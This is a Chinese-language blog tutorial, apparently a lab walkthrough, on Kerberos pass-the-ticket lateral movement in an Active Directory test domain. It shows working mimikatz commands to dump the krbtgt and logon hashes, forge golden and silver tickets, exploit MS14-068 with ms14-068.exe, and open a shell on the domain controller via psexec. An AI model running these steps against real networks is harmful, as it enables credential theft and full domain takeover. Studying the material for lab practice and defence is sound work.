横向移动 --> PTT(Kerberos)

2024-03-16 22:28
文章标签 移动 横向 kerberos ptt

本文主要是介绍横向移动 --> PTT(Kerberos),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

好不容易到了周末,终于有时间来写自己的东西了,那么就来讲一下PTT吧


目录

1.PTT(Past The Ticket)

2.Golden Ticket

1.Krbtgt的NTLM hash

 2.获取域的sid

3.查看要伪造的管理员

4.查看域控名字

5.查看并且清除票据

6.制造黄金票据

3.Sliver Ticket

1.获取服务用户的hash

2.域sid

3.查看并且清除票据

4.伪造白银票据

3.MS14-068

1."3011780"补丁 

2.获取域控的IP

3.域sid

4.漏洞攻击!!!


1.PTT(Past The Ticket)

票据传递攻击(PtT)是基于Kerberos认证的一种攻击方式,常用来做后渗透权限维持。

通过PTT,我们可以在横向移动的时候获得许多意想不到的效果

而PTT的手法一般可以分为以下三种

  1. 黄金票据
  2. 白银票据
  3. MS14-068

2.Golden Ticket

黄金票据,是最厉害的一张票,就是伪造了TGT和sessionkey ,但是前提得知道Krbtgt的ntlm hash  ,下面我们就来演示一下黄金票据

1.Krbtgt的NTLM hash

首先,也是最重要的就是拿下krbtgt的hash了

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:god.org  /user:krbtgt "

可以看见是能拿到krbtgt的ntlm hash的 

 2.获取域的sid

敲上以下的命令

whoami \all

除了那个-1000  直接复制前面的数值就好了 

3.查看要伪造的管理员

net localgroup administrators 

 这条命令可以帮助我们查看域内的管理员,并且知道要伪造的人

4.查看域控名字

net user /domain

可以看见域控的名字叫做 owa 

kerberos::purge

5.查看并且清除票据

这个可以查看当前的票据信息

kerberos::list

 可以看见现在是liukaifeng01的这个账号的票据

那现在肯定是没有权限访问DC的c盘的的

然后清除一下票据

kerberos::purge

可以看见我们是没有了任何的票据

6.制造黄金票据

通过上面的大杂烩,我们就可以制造黄金票据了

kerberos::golden /admin:administrator /domain:god.org  /sid:s-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ptt

来解释一下里面的参数

  1. golden 就是金票的意思
  2. /admin  指定要伪造的管理员的账号
  3. /domain  这个域的名字
  4. /sid  这个域的sid
  5. /krbtgt krbtgt的用户的hash
  6. /ptt  网上有一些版本是先生成票据,再写入内存,我就直接一步到位了!!

可以看见mimikatz就直接帮我们操作了

这时候我们去klist查看一下,可以看见我们的客户端就变成了administrator了,也即是成功的伪造了管理员的身份

这时候我们就能访问到DC的c盘了 

还是那句话,查看文件只是你的谎言,拿shell才是你的真相

那么就用psexec来横向一波

psexec.exe \\owa cmd.exe

 

成功getshll,下一步就是上线cs了,这个相信大家都很熟了,就不在赘述了

3.Sliver Ticket

白银票据,只能让我们去访问对应的服务,而且一旦服务器开启了pac拓展,那么银票就没用了

但是在这里还是来讲一下这张ST

1.获取服务用户的hash

这步直接在域控上跑就好

mimikatz.exe "privilege::debug"  "sekurlsa::logonpasswords" 

记录下对应的hash 

2.域sid

这个不用多说

whoami /all

3.查看并且清除票据

kerberos::list
kerberos::purge   //这两步都是在mimikatz中运行

4.伪造白银票据

mimikatz "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<用户名> /ptt" exit

然后后面的步骤大家伙都已经很熟悉了吧!!!

3.MS14-068

在开始之前,大家还记不记得我刚才说的防止白银票据的方法,就是启用PAC,像这样

但是,加了就无懈可击了嘛??? 那肯定不是!!!

还记得我们之前讲的MS14-068吗?总结一下漏洞原理

  1. 只要客户端指定任意签名算法,KDC服务器就会使用指定的算法进行签名验证,因此可以利用不需要相关密钥的算法,如MD5,实现内容的任意更改
  2. KDC允许用户在Kerberos过程中插入PAC

差不多是这样

知道了原理之后我们就可以来进行复现了

1."3011780"补丁 

先去看看有没有打补丁,否则一切白费

systeminfo | find  "3011780"

可以,开搞!!!!!

2.获取域控的IP

ping "域控名字"  

3.域sid

whoami /all 

4.漏洞攻击!!!

ms14-068.exe -u liukaifeng01@god.org -p hongrisec@2024 -s S-1-5-21-2952760202-1353902439-2381784089-1000  -d 192.168.52.138

还是来讲一下本机的参数

  1. -u 后面是本机的   用户名@域名
  2. -p  指的是本机的密码
  3. -s 完整的域sid
  4. -d 域控的ip

然后就可以拿到一张TGT啦

   

然后就可以将它写入内存!!

Kerberos:ptc TGT_liukaifeng01@god.org.ccache

其中PTC是(Pass the Certificate )证书传递攻击 

然后就可以看见我们的内存中多了一张这样的票

然后就可以横向移动了

psexec.exe \\owa cmd.exe

只不过返回的东西有点奇怪 

换一下编码

chcp 65001

这,也算好了一点了吧 


以上,就是PTT的三种常见攻击方法啦!!! 

这篇关于横向移动 --> PTT(Kerberos)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/816908

相关文章

移动硬盘盒:便携与交互的完美结合 PD 充电IC

在数字化时代的浪潮中,数据已成为我们生活中不可或缺的一部分。随着数据的不断增长,人们对于数据存储的需求也在不断增加。传统的存储设备如U盘、光盘等,虽然具有一定的便携性,但在容量和稳定性方面往往难以满足现代人的需求。而移动硬盘,以其大容量、高稳定性和可移动性,成为了数据存储的优选方案。然而,单纯的移动硬盘在携带和使用上仍存在诸多不便,于是,移动硬盘盒应运而生,以其独特的便携性和交互性,成为了数据存储

VirtualBox中,虚拟系统文件VDI移动或者复制

在安装virtualbox以后有时需要复制,移动虚拟磁盘等操作,这些操作在vmware的虚拟机下面可以直接操作虚拟磁盘即可使用,但是在virtualbox环境 下每个VDI 文件都有一个唯一的uuid,而VirtualBox 不允许注册重复的uuid,所以直接复制的VDI文件是不能拿来使用的,我们就需要使用到virtualbox自带的管理命令来克隆一个VDI,这样通过命令克隆的VDI文件会重

物联网系统运维——移动电商应用发布,Tomcat应用服务器,实验CentOS 7安装JDK与Tomcat,配置Tomcat Web管理界面

一.Tomcat应用服务器 1.Tomcat介绍 Tomcat是- -个免费的开源的Ser Ivet容器,它是Apache基金会的Jakarta 项目中的一个核心项目,由Apache, Sun和其他一 些公司及个人共同开发而成。Tomcat是一一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP程序的首选。 在Tomcat中,应用程序的成部署很简

红队内网攻防渗透:内网渗透之内网对抗:横向移动篇Kerberos委派安全RBCD资源Operators组成员HTLMRelay结合

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。 所以核心就是谁或什么权限能修改

毫米波移动通信系统中的波束赋形

在毫米波移动通信系统中,系统的频点较高,因此毫米波系统的射频器件易于小型化,然而同时也带来绕射能力差、穿透损耗大、路径损耗大[4][5]等缺点,这将大大降低了毫米波通信系统的接收功率,其中阻挡效应被认为是制约毫米波应用于移动通信系统的关键因素之一。为了对抗毫米波移动通信系统的噪声受限问题,目前普遍认为在毫米波移动通信系统中将会在发射端和接收端上同时使用天线阵列进行发送和接收[4][5],因此必须要

在python中使用shutil库移动和复制文件

写一段python脚本,将文件夹中的文件根据文件名称、属性或者时间将文件分成几个不同种类,并保存到设定好的文件夹中。在这里需要用到几个模块。 os模块。主要使用该模块的两个功能,一是检查涉及到的文件夹是否存在,如不存在给出解决方案,停止运行或者新建文件               夹。二是listdir(path)提取源文件夹中的文件目录列表,可遍历此列表实现对文件夹中文件的遍历

移动Web开发实战内容要点!!!

移动web开发 目录 移动web开发 第一章、Web开发标准与网页网站制作介绍 1.1Web开发标准 1.2网页基本构成元素 第二章、Web开发技术基础 2.1HTML的主要特点: 2.2HTML基本知识 2.3CSS样式 2.4JavaScript 第三章、打造移动Web应用程序 3.1为什么Android会成为主流操作系统 3.2测试应用程序 第四章、HTML5在移

红队内网攻防渗透:内网渗透之内网对抗:横向移动篇PTH哈希PTT票据PTK密匙Kerberoast攻击点TGTNTLM爆破

红队内网攻防渗透 1. 内网横向移动1.1 首要知识点1.2 PTH1.2.1 利用思路第1种:利用直接的Hash传递1.2.1.1、Mimikatz 1.2.2 利用思路第2种:利用hash转成ptt传递1.2.3 利用思路第3种:利用hash进行暴力猜解明文1.2.4 利用思路第4种:修改注册表重启进行获取明文 1.3 PTT1.3.1、漏洞-MS14068(webadmin权限)-利用

cpp随笔——浅谈右值引用,移动语义与完美转发

右值引用 什么是右值 在cpp11中添加了一个新的类型叫做右值引用,记作&&,而在开始今天的正文之前我们先来看一下什么是左值什么是右值: 左值(&):存储在内存中,有明确存储地址的数据右值(&&):临时对象,可以提供数据(不可取地址访问) 而在cpp11中我们可以将右值分为两种: 纯右值:非引用返回的临时变量,比如运算表达式产生的临时变量,原始字面量以及lambda表达式等将亡值:与右值

移动终端app测试点总结

以下所有测试最后必须在真机上完整的执行1、安装、卸载测试 在真机上的以及通过91等第三方的安装与卸载安装在手机上还是sd卡上 2、启动app测试3、升级测试  数字签名、升级覆盖安装、下载后手动覆盖安装、跨版本升级、升级后可以正常使用。  覆盖安装要确保数据库有字段更新的话,能正常更新,否则就容易导致app异常。4、功能测试  包括功能点、业务逻辑、关联性(主要测试客户端与PC端的交互,客户端